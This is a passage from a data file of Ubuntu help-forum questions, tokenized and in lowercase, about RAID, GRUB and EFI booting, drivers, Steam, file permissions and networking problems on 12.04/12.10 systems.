caused it on it 's own . i am relatively new to the linux scene .
257033	dmraid issues with intel matrix storage ( ntfs )	i have a raid 5 array set up in windows 7 using the intel matrix storage manager , which is , to the best of my knowledge , known as `` fakeraid '' . i installed ubuntu 12.04 lts side-by-side with w7 , and i 'm trying to get it to detect my raid 5 array . when i run the command dmraid -ay as root , i get the following error : error : bbm entries detected ! error : raid set `` isw_eacjaeeegj '' ca n't be activated anyone know what 's wrong here ? i have no idea what bbm entries are , and searching for it does n't really get me anywhere ( lots of results for blackberry messenger ) . edit : running dmraid -s gives me the following : *** group superset isw_eacjaeeegj -- > subset name : isw_eacjaeeegj_storage size : 8790817536 stride : 128 type : raid5_la status : ok subsets : 0 devs : 4 spares : 0
257034	chrome popup malware `` openadserving.com '' ?	when i 'm using chrome i 'm getting fullscreen popup advertising even on sites that i am certain do not have it . i see the web site it is trying to load is `` www.openadserving.com '' in the status bar . i suspect this is some kind of browser or os virus . how can i deal with this on ubuntu ? is there some tool i can run to detect the virus ? or can i totally reinstall chrome somehow ?
257035	how do i fix the mouse after pairing with bluetooth ?	i have a laptop with ubuntu 12.04 lts on it . i paired a bluetooth mouse with it , which caused the touch pad on the laptop to stop working . after the computer was suspended over night , i tried to use the mouse when it said : mouse is trying to access your computer , grant access ? but i ca n't click the buttons as now neither the touch pad nor the mouse works . i ca n't alt+ tab to the window as it opens under the other windows and does not show in the list . i tried enabling mouse control via the keyboard using universal access but i do n't have a keypad on my laptop .
257036	missing /etc/default/grub	i just re-installed ubuntu 12.10 after having various issues , it was just time for a re-format and re-install . installation the install went the smoothest that it has ever gone . except that on my installed system i do n't have the /etc/default/grub file that i need to configure grub . in my curiosity i ran sudo update-grub , and it ran seamlessly despite the file missing . i will add that i am installing grub-efi , and loading it via refind on boot . attempted repairs i 've also re-downloaded ubuntu , re-formatted and re-installed , verified files and md5 sums on the new installation media , and yet they 're still gone . i 've also tried the ubuntu boot repair tool , which completed successfully but did n't actually restore the /etc/default/grub file . question how can i get the needed /etc/default/grub configuration file ? thanks for your help in advance .
257038	`` sudo rm '' fails to delete files	my main account is called `` u1204 '' and i have some files created with another account called `` dad '' : $ find . -user dad -print ./documents/zim notes/.zim/state.conf ./documents/zim notes ( dad ) /.zim/state.conf [ ... others omitted ... ] $ ls -l `` ./documents/zim notes/.zim/state.conf '' -rw-rw-r -- 1 dad dad 4407 feb 13 23:33 ./documents/zim notes/.zim/state.conf $ sudo rm `` ./documents/zim notes/.zim/state.conf '' [ sudo ] password for u1204 : rm : can not remove `./documents/zim notes/.zim/state.conf ' : permission denied using `` sudo nautilus '' is no more successful . i thought that a super user could delete anything ? i could delete them from the other account but i 'd like to understand what 's going on . thanks . [ edit ] additional information as requested in comments : /etc/sudoers # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all in `` user accounts '' both accounts are identified as `` adminstrator '' ; sudo generally works ; both accounts belong to group `` u-glob '' $ ls -la `` ./documents/zim notes/.zim/ '' total 44 drwxrwx -- x 2 u1204 u-glob 4096 feb 13 23:37 . drwxrwx -- x 9 u1204 u-glob 4096 jan 31 12:10 .. -rwxrwx -- x 1 u1204 u-glob 25600 feb 13 23:37 index.db -rw-rw-r -- 1 dad dad 4407 feb 13 23:33 state.conf
257040	alt-tab stopped working after upgrade to qq / 12.10	i recently upgraded from pp to qq which broke the ability to switch between running applications by pressing alt+tab which is such a showstopper i never believed could ever be . the affected host is a thinkpad x61s . i 'm not quite sure if this is of any relevance but i think unity/compiz is running on llvm - not even sure if this statement makes any sense at all . so until now i tried several countermeasures in any combination imaginable to tame that beasty behaviour - running out of ideas as of now after having tried every hint i could find : bound , unbound and rebound the settings/keyboard/shortcuts/navigation/switch applications key over and over again massive amount of reboots activated , deactivated , reactivated switchers and set , unset , reset plugins and their key bindings - even other ones as alt+tab - in ccsm under unity plugin window mgmt - application switcher and static application switcher deactivated alt as a hotkey for the hud even switching keyboard layouts all to no avail which led me here : any ideas , any ubuntu one ? it may be worth mentioning that the alt keys themselves are working as shown by xev . i can access the menu , too . what makes me wonder is the fact that i can get the hud by tapping alt_r but not by using alt_l ( so i tried removing the hud key binding which as stated did n't work ) . app switching itself is not possible using either alt key . this highly unwanted behaviour is the same using the internal keyboard as well as my bluetooth one .
257043	starting xmodmap on login ( 12.10 )	i 'm a little confused about the automatic startup of xmodmap . web said i just have to create an .xmodmap file in my home folder or an .xinitrc or .xsession script in home or a startup application/command launching xmodmap but none of these worked oob . after some messing around i found that adding a sleep instruction to my xmodmap script started via startup applications achieved the desired effect . as i did n't encounter any mention of sleep during research : is this really needed/intended ? should any of the other ways ( plain .xmodmap file or .xinitrc/.xsession script ) work in qq ? plus , as recently discovered , the xmodmap is reset after waking up from standby , any hint on what to do about that ? thanks a lot for any help or clarification . .xmodmap ( working as intended when called manually ) : keycode 29 = z z y y leftarrow yen k k exclam greek_kappa exclamdown nosymbol multiply keycode 52 = y y z z guillemotright u203a udiaeresis udiaeresis numbersign nosymbol escape escape union
257048	grub wo n't find windows 7 partition	i have a customized sony vaio s with default windows 7 64-bit and manually installed ubuntu 12.04 64-bit installed on it . i use grub as boot manager and initially it worked , booting both windows 7 and ubuntu . after some updates on ubuntu it broke grub and i reinstalled it . now it wo n't let me boot into win7 , apparently there are some issues with efi . blkid gives me the following : /dev/sda1 : label= '' sonysys '' uuid= '' 72d1-8783 '' type= '' vfat '' /dev/sda2 : label= '' recovery '' uuid= '' 6e62e06762e0360d '' type= '' ntfs '' /dev/sda3 : label= '' boot '' uuid= '' 5cf7-3aee '' type= '' vfat '' /dev/sda5 : label= '' win7 '' uuid= '' bedc4befdc4ba10f '' type= '' ntfs '' /dev/sda6 : uuid= '' aaff8b62-cffe-4e3c-a539-f57e36f293f8 '' type= '' ext4 '' /dev/sda7 : uuid= '' a26bdd92-07e5-41ed-b7cf-79dfcb89560c '' type= '' ext4 '' /dev/sda10 : uuid= '' 20565c91-c106-4761-914c-b1c33ed07d1f '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' f29a5cfc-c098-4308-bada-a519c404d0d4 '' type= '' swap '' sda10 and sda6 are my root and home directory , respectively . boot-repair gives the following output : http : //paste.ubuntu.com/1665681 the first win7 enty in grub from 30_os-prober windows recovery environment ( loader ) ( on /dev/sda5 ) ( fixed by boot-repair ) gives the following error : error : unknown command 'drivemap ' . error : invalid efi file path . the other ones from 40_custom windows 7/windows 7 alter/etc . : black screen and a white rectangle . after a few seconds returning to grub . i tried using refind to boot into win7 , without success . when i click on the win7 button , it returns to grub . are there any solutions apart from reinstalling win7 ? sorry for the messy grubfiles , i tried several ways to boot win7 .
257051	how to get speakers working in 10.04 , when they are silent at any volume ?	recently i installed ubuntu 10.04 64-bit in my sony vaio machine and i figure out that speakers are totally disabled . at first i thought that the volume was to low , but that was n't the case . i even update and upgrade , but the problem remains . any suggestions would be greatly appreciated ! executing the command lspci , i get the following output : 00:00.0 host bridge : intel corporation device 0104 ( rev 09 ) 00:02.0 vga compatible controller : intel corporation device 0126 ( rev 09 ) 00:14.0 usb controller : intel corporation device 1e31 ( rev 04 ) 00:16.0 communication controller : intel corporation device 1e3a ( rev 04 ) 00:1a.0 usb controller : intel corporation device 1e2d ( rev 04 ) 00:1b.0 audio device : intel corporation device 1e20 ( rev 04 ) 00:1c.0 pci bridge : intel corporation device 1e10 ( rev c4 ) 00:1c.1 pci bridge : intel corporation device 1e12 ( rev c4 ) 00:1c.2 pci bridge : intel corporation device 1e14 ( rev c4 ) 00:1d.0 usb controller : intel corporation device 1e26 ( rev 04 ) 00:1f.0 isa bridge : intel corporation device 1e59 ( rev 04 ) 00:1f.2 sata controller : intel corporation device 1e03 ( rev 04 ) 00:1f.3 smbus : intel corporation device 1e22 ( rev 04 ) 01:00.0 network controller : atheros communications inc. device 0032 ( rev 01 ) 02:00.0 class ff00 : realtek semiconductor co. , ltd. device 5209 ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 )
257054	weird screen resolution in ubuntu 12.10	i have dell 7520 with amd raedon 7xxxm graphics card , thankfully , i got to make it work . but the problem now is screen resolution , as i have screen resolution of 1920 x 1080 for 15.6 '' laptop , which is way too much . in the display monitor settings , i can not change it to whatever i want , only the resolution with 16:9 works perfectly . i have options for other resolution setting but , selecting others brings the screen edges near , that means it leaves gap on both sides of screens . and to read contents from such high resolution is too small , as i need magnifying glass . i have other suitable 16:9 resolution as 1360 x 768 but thats too big . i want something like 1600 x 1024 which would be good resolution for me . but when i change that via display monitor settings , again the edge becomes narrow . i do n't have the option of widening the layout from keyboard shortcuts too , if there is any way to fix this then it 'd be very great ...
257057	how to access intel matrix raid 0 from installed system ( live usb had detected it automatically ) ?	i have intel matrix storage drive that have 2 hard drives installed in stripe . when i boot computer with ubuntu 12.10 live ( from usb ) i can access this `` virtual '' drive from raid . after installing ubuntu on another hard drive this virtual partition is not accessible . in disk manager i can see hard drives but not the virtual drive . what is missing ?
257059	intel display controller unclaimed	i have just reinstalled ubuntu 12.10 on my optimus laptop with intel ivy bridge and nvidia 650m graphics cards . i have set up bumblebee following this guide : http : //www.webupd8.org/2012/12/use-nvidia-experimental-drivers-310.html optirun works , but when using the integrated graphics , i have a slew of issues which i think come from my intel display controller not loading the right driver . among them are crashes when logging out , crashes when resuming from suspend , being unable to adjust screen brightness and my cursor being invisible when not moving . i have tried googling , but have been unable to solve the problem on my own . this is my lshw : sudo lshw -c display *-display unclaimed description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) i think the intel display controller was unclaimed before i installed bumblebee , but i 'm not completely sure . additionally when i do lsmod , i915 ( which i think should be the driver ? ) is not listed anywhere . i have tried following the advice in post # 9 here : http : //ubuntuforums.org/showthread.php ? t=1800447 in order to force the driver to load with modprobe . however , when i run sudo service gdm stop , i simply get gdm : unrecognized service i am only a linux user of a few months , so maybe i am missing something obvious here . i am very fuzzy on how x , gnome , unity and the driver system works . edit : okay , so apparently the vesa driver is loading instead of the intel driver . i found ot why sudo service gdm stop did n't work . apparently the advice was outdated , so i tried with sudo service lightdm stop instead . this causes my screen to turn this weird pink-purple colour , and becomes unresponsive . in this state , i am unable to bring up a terminal by ctrl+alt+f1 . i tried to restart lightdm blindly , but got no response . my only option was to press the power button , which seems to initiate shutdown . so , i think the question has become , how do i unload the vesa driver , and load the proper intel driver instead ?
257060	i want to read my *.bok and *.mdb in ubuntu 12.04 ?	when i use windows i read my arabic book ( *.mdb & *.bok ) by maktaba shamela . and now i use ubuntu 12.04 and i need to read my *.bok & .mdb file . i tried to install makatba shamela with wine but the arabic font was not showed . i tried to install thwab ( not thawab ) to read my arabic book ( .bok ) , but i could not install it . and now i wan na install maktabah al-miftah . but to read *.bok need to import file ( .mfth ) from shamela file ( .bok ) by using accessdump.py and it depends on gambas3-gb-db-sqlite3 . what can i do ?
257062	does version 12.10 support amd graphics hd 6450	running 12.10 ( 64 bit ) / unity / on hp pavillion elite , intel core i7 ( 3.2ghz ) , 12 gb memory graphics is listed as unidentified , need help please thanks in advance pete
257064	hide a photo album from ubuntu one website	i 've been wondering if there 's a way to hide a photo album from the main view of the ubuntu one website `` photos '' tab ... i 've explored the tab thoroughly but i could n't find any such option , just the sharing ones . any idea about how to make it happen ( without having to delete the album , of course ! ) ?
257066	mount ntfs partition with write access for everyone	how can i mount a ntfs partition so that all user accounts on my machine have write access ? my mount options are nosuid , nodev , nofail , x-gvfs-show , nobootwait , uid=1000 , gid=1002 , fmask=113 , dmask=002 this gives me write access but when other users try to delete a file the error message pops up can not move file to trash , do you want to delete immediately ? as i understand this is because they do n't have write access which is what i want to change . i created a new group ( with gid=1002 ) and assigned it as primary group to both user accounts but that did n't help . i also tried mounting without the fmask , dmask and uid options .
257069	why has networking for my 12.04 setup stopped working ?	i have a thinkpad x201 with an intel-based network card with an n-6200 wifi . all of a sudden neither ethernet nor wifi works . i get a dhcp address , and can connect to local lan resources ( via http or other protocols ) , but ca n't get beyond the router . this is not specific to a network , as i have had this issue at home , but also on the road . i have an xp virtual box machine that i 'm running as a guest . if i change the network config in virtual box to `` bridged '' and give myself a static ip address in the windows guest session with an external dns entry ( e.g . 8.8.8.8 ) i can get get internet access . also if i boot to a live usb on the same hardware , same network , no issues . i have already disabled n networking on the wlan interface , but that does n't fix it , but of course has no effect on ethernet . help ! ! ! ! eth0 link encap : ethernet hwaddr 5c : ff:35:04 : ab : de inet addr:192.168.1.29 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :5eff:35ff : fe04 : abde/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:21563 errors:0 dropped:0 overruns:0 frame:0 tx packets:17982 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:18938624 ( 18.9 mb ) tx bytes:1921823 ( 1.9 mb ) interrupt:20 memory : f2500000-f2520000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1693 errors:0 dropped:0 overruns:0 frame:0 tx packets:1693 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:606855 ( 606.8 kb ) tx bytes:606855 ( 606.8 kb ) wlan0 link encap : ethernet hwaddr 00:23:14:7a : bf:78 inet addr:192.168.1.28 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :223:14ff : fe7a : bf78/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2528 errors:0 dropped:0 overruns:0 frame:0 tx packets:610 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:427700 ( 427.7 kb ) tx bytes:100284 ( 100.2 kb ) iwconfig lo no wireless extensions . vboxnet0 no wireless extensions . wlan0 ieee 802.11abg essid : '' manukai_1 '' mode : managed frequency:2.462 ghz access point : 4c:60 : de:2e : cc : c4 bit rate=1 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-7 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:61 missed beacon:0 eth0 no wireless extensions . lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:16.3 serial controller : intel corporation 5 series/3400 series chipset kt controller ( rev 06 ) 00:19.0 ethernet controller : intel corporation 82577lm gigabit network connection ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 02:00.0 network controller : intel corporation centrino advanced-n 6200 ( rev 35 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 )
257070	interrmitent connection to server	i am fairly new to linux and am having some difficulty with connecting to the new ubuntu server i have just installed . along with ubuntu server 12.10 , i have selected the default settings and have installed ssh during the initial install . php has been installed as well as apache . i have created a web application which works fine on another server so i believe that the application is not the issue . accessing the web interface from localhost works fine and seems to be consistent . accessing from an external source via the servers ip is intermittent at best . once connected , the application works just fine until the page gets refreshed or i save a change . at that point , the site connection becomes intermittent again . ping works without a hiccup . ssh also is experiencing the same intermittent issues . most of the time i get the following error : error 324 ( net : :err_empty_response ) : the server closed the connection without sending any data . i am lost to find a solution for this and hope that someone has an idea .
257072	ca n't access my user account ubuntu 12.04	i have no idea why but it just sends me back to the login screen whenever i try to login my main account . so i made a second account from guest account and used nautilus as sudo ( root ) and checked my home main user files and all that is there is : access-your-private-data.desktop and readme.txt but i do n't understand i have n't encrypted my drive so what do i do to get my data back , i would really like to get it back i ca n't understand what has happened .
257073	dual boot ubuntu 12.04.2 & windows 7 ( seperate drives )	i have successfully installed windows 7 and ubuntu 12.04.2 on seperate ssd drive . used the attach/detach method to instal . i detached disk2 ( ubuntu drive ) then installed windows 7 on disk1 . then i disconnected disk1 , connected disk2 and installed ubuntu . i read this was a good way to do it as it will prevent grub2 from overwriting the windows bootloader . not both disk1 and disk2 are hooked up and i can now boot in to each os successfully by selecting the various disk at bios level . i would like to skip the bios and auto boot into ubuntu then use grub2 to select if i want to boot into windows 7 . grub2 is not working for me and i was thinking about using boot repair to repair grub2 from a liveusb . my worry though , is that if i run boot repair , it will overwrite my windows bootloader ? should i run boot repair with my windows drive unhooked ? what are your thoughts to get grub2 working with out touching disk2 ?
257077	location of ubuntu hp printer driver	i saw a on the hp website that they have printer drivers for ubuntu machines . i have tried to find a driver for my hp printer and i have not had much success . can anyone point me to where i could download the 32-bit x86 ubuntu 12.04 driver for a hp c4200 printer ?
257078	/casper/vmlinuz : not found	when i start ubuntu and chose one of the settings it says : /casper/vmlinuz : not found i have ubuntu on a usb drive . i used this usb creator : http : //www.linuxliveusb.com/ i have done this 2 times now and the same thing happens . what can i do ? i even checked my casper directory . it has the vmlinuz file but it still reports the same error .
257082	i 'm trying to install tf2 from steam but it wo n't allow me to install because i only have 220mb ( but i have well over 50 gigs ?	i try to install tf2 but it says i do n't have enough space but , i have well over 50gb on my laptop , what 's wrong and how do i fix it ?
257084	how do i install steam on a 64bit system ?	alright so my computer is 64-bit and i only want to use linux to install steam , play team fortress 2 and get that penguin item but it 's not working out for me . the version of ubuntu i installed was the `` wubi.exe '' which let 's me use it along with windows . but when i get it up and download the steam .deb file , it tells me `` wrong architecture 'i386 ' '' . what do i have to do to run ubuntu alongside windows without using a cd/usb stick ?
257090	i ca n't open compizconfig after some updates	after some updates i ca n't open ccsm . it just wo n't start but the settings i added before this problem are still working . thanks
257091	unity // taskbar gone [ 12.10 ]	i tried to update my graphics driver to properly use xbmc , and suddently the taskbar // unity ( not quite sure its called ) the side bar & top bar vanished after a restart , as im quite new to the linux os . it is currently showing that my current graphics driver is : `` vesa : gt218 board - 06910002 '' which is completly unknow for me , it appeared after the restart . note : - amd athlon ( tm ) ii x2 215 processor x2 - nvida graphics card
257093	how to change from legacy boot to uefi boot ?	so , i have been trying to get ubuntu linux on my windows 8 pre-installed vaio laptop . the usb stick containing the ubuntu boot was n't working right , so i went into the bios and changed uefi boot to legacy . now when i turn on my computer with the usb , it displays , `` syslinux 4.04 edd 2011-04-18 copyright ( c ) 1994-2011 h. peter anvil et al '' . without the usb , it just says that there is no operating system , and windows 8 does n't boot . i am worried that i broke my computer . can anyone tell me how to change back to uefi so that windows 8 will boot , or even how to get the linux ubuntu usb to boot right ? thanks . 1 second ago - 4 days left to answer .
257094	windows 'like ' start menu	is there any start menu ( that i can use along with gnome 3 ) that looks like traditional windows start menu ? if so , it 's also possible to see all open applications on the `` taskbar '' ?
257102	how to run windows steam games from linux steam ( with wine ) ?	i am currently using 2 versions of steam , the linux one for games compatible with linux , and the windows version in wine for games which are not compatible . i was wondering if it is possible to get wine to work on games in linux steam ( the one not using wine ) , so i do not have to switch back and forth between the two steams .
257106	multiple issues ; kernel panic , random crashing , unable to install/ remove programs	so i have been having issues pretty much since installation . i have 12.10 installed on an hp pavillion dv6000 . it goes into kernel panic ( i think ) almost every time i interact with the dash , and sometimes when i interact with the launcher . i can not install or remove programs , it once popped a message up saying that something was broken , the program index or something , and gave me a line of code to run in the launcher to `` fix it at first '' , but i couldnt copy it , and when i went to manually type it in the terminal , it disappeared ... also , it crashes whenever it feels like . and sometimes it takes 3-4 start ups to get it to actually run when i turn it on , which is quite frustrating because the battery can only keep this thing running for about 5 minutes once its unplugged . this computer is driving me insane ! i can barely do anything with it , and i 'm too broke to buy a new computer . somebody , please , help me..
257108	trying to start nginx on vps , i get `` nginx : unrecognized service ''	following the how to install rails and nginx with passenger on ubuntu tutorial from digitalocean.com , the seventh step manually starts nginx : sudo service nginx start but fails with the following error : nginx : unrecognized service
257112	install drivers	i 'm currently using ubuntu 12.10 64bit alongside with windows 7 professional 64bit on a custom hardware desktop pc , and i 've noticed that i do n't have the correct drivers for ubuntu , since i 'm experiencing some graphical and sound glitches . so ... how can i install the correct drivers for my pc without affecting my windows 7 drivers , that 's pretty much it . thanks ps : my hardware is : ( sorry for not having this here in the first place ) grapics card : nvidia geforce gts 450 motherboard : asus p7p55 lx cpu : intel core i5-650
257135	how do you connect to wifi on mac os x	when i installed ran ubuntu 12.10 by live cd on my imac , it could not connect to a wifi network . when i click on the wifi network button on the top bar it does not display any networks at all but i know there are at least 3 in my area . i do n't know how old the imac is .
257141	i ca n't install libreoffice base into ubuntu 12.04	i am running ubuntu 12.04 on my usb . i have everything from libreoffice but the base app . when i search in the software center it comes up and i click install but after 30 seconds it fails with this message : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b24-1.11.5-0ubuntu1~12.04.1_i386.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b24-1.11.5-0ubuntu1~12.04.1_i386.deb 404 not found [ ip : 91.189.92.200 80 ] ( first two only as i need `` reputation 12 to post more than 2 links '' ) what is happening ? please keep in mind that i am a complete noobie to linux and ubuntu ! is there anyway i can get base ? or am i sol ? thanks !
257142	wubi install problem	i 've been trying to install ubuntu onto my laptop . about a year ago i used wubi and installed ubuntu and everything was working fine except occasionally ubuntu would not boot and get stuck on some `` pci port error '' ( something like that ca n't really remember now ) . anyways , i got frustrated with the inconsistent start up of ubuntu so i decided to uninstall wubi on my laptop . after i uninstalled it , i tried to use wubi again and this time ubuntu would try to boot but it would freeze on a broken screen . broken i mean , if i had windows 7 running before it . ubuntu would get stuck on this screen that seem to have screen captures or fragments of my windows session . if i try to start wubi , without having the computer first boot into windows it gets stuck on the same fragmented screen without the windows screen captures . i 've attached a picture to clear things up . i 've tried re-installing wubi a bunch of times and nothing has changed .
257143	how do i install the drivers for my mobility radeon ati card ?	on this question i figured out that i needed to install drivers for my graphics card . the output of lspci says i have 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv200 [ mobility radeon 7500 ] and in dash > detail says my graphics are r100 ( rv200 4c57 ) x86/mmx/sse2 tcl dri2 how do i install the drivers for my card ? i think i need the drivers because i am trying to get tf2 working which i asked about with this question team fortress 2 black screen
257147	can i install ubuntu to a usb3 flash drive to play steam games ?	i 'm thinking of buying a 64 gb usb 3.0 flash drive to put ubuntu 12.10 on . if i do this , can i then install steam on the flash drive and play steam games ?
257150	uninstalling ubuntu for a fresh start	after failing countless times to install ubuntu to dual boot with windows 7 , i decided to try to get rid of all things ubuntu and try again . there is no partition in my hard drive that i can find at this point , but when i go to re-install ubuntu it says that i already have 2 oses installed , and i ca n't use the normal install alongside option . is there anything i am missing that is making it think there is something left ?
257154	configure vsftpd to chown uploaded files	i have vsftpd up and running on my ubuntu server . this is a development server and i want to be able to ftp my code directly to the directory which apache is serving out . as most of you know , www-data is the apache user and the www-data user needs to have permissions to the directory that apache is serving out . i did n't want to make www-data an ftp user as well , so what i did instead was create another user for use with ftp , and put both www-data and the new user in a new group called www . i did a chown -r www-data : www * to the directory that apache is serving and it works mostly fine . the issue comes in when i ftp upload a file that did n't previously exist in that directory . the owner gets set to my ftp user . i want the owner to get set to www-data and the group to get set to www whenever a new file gets uploaded . is there any way to do this with vsftpd ? i 've been furiously googling around for hours , but i ca n't find a way to do it . any help would be greatly appreciated . edit : i just set up a couple of cron jobs to run every minute and set the permissions : */1 * * * * chown -r www-data : www /var/www */1 * * * * chmod -r g+rw /var/www it works but it 's kind of clunky , and there 's a ~1 minute delay between me uploading new code and having it work when i hit f5 in my browser .
257155	ubuntu 64 bit and win7 64 efi does not work together	i 'm desperately trying to install ubuntu on my win7 machine , without success . i tried to : - install a boot partition on ubuntu on c : \ , where windows lives , and `` / '' ( root ) in my other hard drive , which is big and nice . - the boot partition is primary and ext2 . is mounted as `` /boot '' after installation , i tried using easybcd to make an entry for ubuntu , but when launched , it just shows a grub prompt . no idea what to do there . any help ?
257166	ubuntu is slow . is it due to 2 os 's ?	i have been running ubuntu 12.10 in it 's own partition for dual-boot with windows 7 for a week now . would running ubuntu like this make it run slower ? would it be faster if i installed ubuntu over windows 7 and have it as my only os ? what 's running slow ? opening a video file in vlc player ( 800mb/4gb file ) takes at least 3 seconds . extracting files takes much longer than doing with winrar in windows . my laptop has an i3 with 4gb ram . thanks for your time . ( currently i 'm still deciding between the 2 os 's )
257168	help me please , install problems on acer aspire 5515	so , i have an acer aspire 5515 with windows 7 ultimate installed . i have an amd athlon ( tm ) processor 2650e 1.60 ghz processor . 1 gb ram , with a 160 gb hdd . so here 's what i did : i parititioned my hard drive . i have three partitions : a 10 gb hidden partition ( for my bios ) , a 69.5 gb c : / partition ( holds my windows os ) , and finally , a 69.5 gb partition that i used to install ubuntu 12.10 . i burned the .iso to a disc , and i formatted the third partition to a ext journaled 4 with the ubuntu install disc , and then i installed ubuntu on the third partition . then it took me to a reboot , and rebooted into windows normally . i have no idea what to do from here , i mean , it seemed like the install process went normal . any ideas ? help ? instructions ?
257174	why wo n't ubuntu use the memory i have left on my pc ?	i recently installed ubuntu on my pc . when i tried installing a valve game on ubuntu , it said that i only have 2000 megabytes of memory left on my pc . when i switched back to windows 7 , it said that i have another 500 gigabytes of memory left . i would really appreciate it if someone could find me an answer to this problem .
257175	i cant remember my password	my computer goes on standby every 5mins and will then request for an authentication password ; i cant remember setting any password . so i will have to restart the computer again before i can use it . similar problem occurs when ever i want to upgrade or download a software ; it keeps asking for authentication password and would not allow me to make any updates . i never set up any authentication password
257177	no sound output from vm using ubuntu 12.10 server host and 12.04 guest	i am running server 12.10 and kvm host and 12.04 as guest . my sound works fine through the host but ca n't get sound from quest through host hardware . sound test in system settings of guest pops and it lets you conduct the test but no output through host hardware . my sound card is as follows : rob @ vserver : / $ hwinfo -- sound > hal.1 : read hal dataprocess 15216 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 17 : pci 14.2 : 0403 audio device [ created at pci.318 ] unique id : 5dex.fxfmwihogod sysfs id : /devices/pci0000:00/0000:00:14.2 sysfs busid : 0000:00:14.2 hardware class : sound model : `` ati sbx00 azalia ( intel hda ) '' vendor : pci 0x1002 `` ati technologies inc '' device : pci 0x4383 `` sbx00 azalia ( intel hda ) '' subvendor : pci 0x103c `` hewlett-packard company '' subdevice : pci 0x2ac8 revision : 0x40 driver : `` snd_hda_intel '' driver modules : `` snd_hda_intel '' memory range : 0xfeb00000-0xfeb03fff ( rw , non-prefetchable ) irq : 16 ( 1124 events ) module alias : `` pci : v00001002d00004383sv0000103csd00002ac8bc04sc03i00 '' driver info # 0 : driver status : snd_hda_intel is active driver activation cmd : `` modprobe snd_hda_intel '' config status : cfg=new , avail=yes , need=no , active=unknown 34 : pci 100.1 : 0403 audio device [ created at pci.318 ] unique id : nxns.t+92qidgoic parent id : _znp.mxgz4st7tg6 sysfs id : /devices/pci0000:00/0000:00:02.0/0000:01:00.1 sysfs busid : 0000:01:00.1 hardware class : sound model : `` ati audio device '' vendor : pci 0x1002 `` ati technologies inc '' device : pci 0xaa98 subvendor : pci 0x1462 `` micro-star international co. , ltd. '' subdevice : pci 0xaa98 driver : `` snd_hda_intel '' driver modules : `` snd_hda_intel '' memory range : 0xfea40000-0xfea43fff ( rw , non-prefetchable ) irq : 82 ( 155 events ) module alias : `` pci : v00001002d0000aa98sv00001462sd0000aa98bc04sc03i00 '' driver info # 0 : driver status : snd_hda_intel is active driver activation cmd : `` modprobe snd_hda_intel '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 9 ( pci bridge ) modules rob @ vserver : / $ lsmod | grep snd snd_hda_codec_hdmi 32049 1 snd_hda_codec_idt 70210 1 snd_hda_intel 33492 5 snd_hda_codec 